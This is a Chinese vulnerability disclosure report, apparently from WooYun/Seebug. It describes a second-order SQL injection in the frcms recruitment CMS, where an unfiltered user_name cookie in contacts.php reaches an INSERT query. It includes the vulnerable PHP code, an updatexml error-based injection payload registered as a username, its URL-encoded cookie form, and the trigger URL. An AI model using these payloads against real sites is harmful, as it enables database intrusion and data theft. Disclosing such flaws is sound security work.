### 简要描述: rt ### 详细说明: 看到frcms\inc\contacts.php ``` if($companyid!=0){ if($hireid!=0){ $db ->query("update {$cfg['tb_pre']}hire set h_visitcount=h_visitcount+1 where h_id=$hireid and h_comid=$companyid"); $goto=$cfg['path']."co/hire.php?id=$hireid"; $rs = $db->get_one("select h_place,h_address,h_post,h_contact,h_telshowflag,h_tel,h_fax,h_emailshowflag,h_email,h_member,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}hire INNER JOIN {$cfg['tb_pre']}member on h_comid=m_id where h_id=$hireid and h_comid=$companyid"); if($rs){ $Complace=$rs['h_place'];$Comaddress=$rs['h_address'];$Compost=$rs['h_post'];$Comcontact=$rs['h_contact']; $Comtelshowflag=$rs['h_telshowflag'];$Comtel=$rs['h_tel'];$Comfax=$rs['h_fax']; $Comemailshowflag=$rs['h_emailshowflag'];$Comemail=$rs['h_email'];$ComMemberlogin=$rs['h_member']; $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat']; }else{ echo "联系方式读取出错!";exit; } }else{ $db ->query("update {$cfg['tb_pre']}member set m_hits=m_hits+1 where m_id=$companyid"); $goto=$cfg['path']."co/company.php?id=$companyid"; $rs = $db->get_one("select m_address,m_post,m_contact,m_telshowflag,m_tel,m_fax,m_emailshowflag,m_email,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}member where m_id=$companyid"); if($rs){ $Comaddress=$rs['m_address'];$Compost=$rs['m_post'];$Comcontact=$rs['m_contact']; $Comtelshowflag=$rs['m_telshowflag'];$Comtel=$rs['m_tel'];$Comfax=$rs['m_fax']; $Comemailshowflag=$rs['m_emailshowflag'];$Comemail=$rs['m_email'];$ComMemberlogin=$rs['m_login']; $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat']; }else{ echo "联系方式读取出错!";exit; } } $member_name=_getcookie("user_name");$Show=0;$bid=$hireid!=0?$hireid:$companyid;$type=$hireid!=0?3:2; if($username==''){$member_login="访客";$member_name="访客";}else{$member_login=$username;} $db ->query("Insert into 
{$cfg['tb_pre']}rbrower(r_bid,r_bmember,r_member,r_adddate,r_name,r_type) values('$bid','$ComMemberlogin','$member_login',NOW(),'$member_name',$type)"); ``` 其中$member_name是从_getcookie("user_name")获得。然后进入了sql语句。 查看_getcookie函数 ``` function _getcookie($var) { global $cfg; $var = $cfg['cookie_pre'].$var; return isset($_COOKIE[$var]) ? $_COOKIE[$var] : ''; } ``` 查看全局文件也没发现对cookie的过滤。 然后注册一个真实名字为 ``` =1' updatexml(1,concat(0x7e,(user())),0) or'','1','1','1')# ``` 的用户。 [<img src="https://images.seebug.org/upload/201502/23200737a376f60a2437555608b3f3b763ce1e83.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/23200737a376f60a2437555608b3f3b763ce1e83.jpg) 入库之后去除了转义符 [<img src="https://images.seebug.org/upload/201502/2320091774591ef2269acf9222a716f7959481d9.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2320091774591ef2269acf9222a716f7959481d9.png) 然后访问 ``` http://127.0.0.1/frcms/inc/contacts.php?resumeid=1 ``` [<img src="https://images.seebug.org/upload/201502/23201009898cf75ae389e1ee6ce917e151fe5f97.jpg" alt="7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/23201009898cf75ae389e1ee6ce917e151fe5f97.jpg) 可以看到mysql已经报错。其中 ``` fr_user_name==%3D1%27+or+char%28%40%60%27%60%29+or+updatexml%281%2Cconcat%280x7e%2C%28user%28%29%29%29%2C0%29+or%27%27%2C%271%27%2C%271%27%2C%271%27%29%23 ``` 这时查看mysql的记录日志可以发现 [<img src="https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg" alt="9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg) 语句已经成功执行 然后根据我上个洞 [WooYun: 嘉缘人才系统最新版注入(无视防御)](http://www.wooyun.org/bugs/wooyun-2015-091024) > 可以知道该cms的mysql错误会储存在一个文件中,以及如何找到这个文件 [<img src="https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg" alt="8.jpg" width="600" 
onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg" alt="9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg) [<img src="https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg" alt="8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg)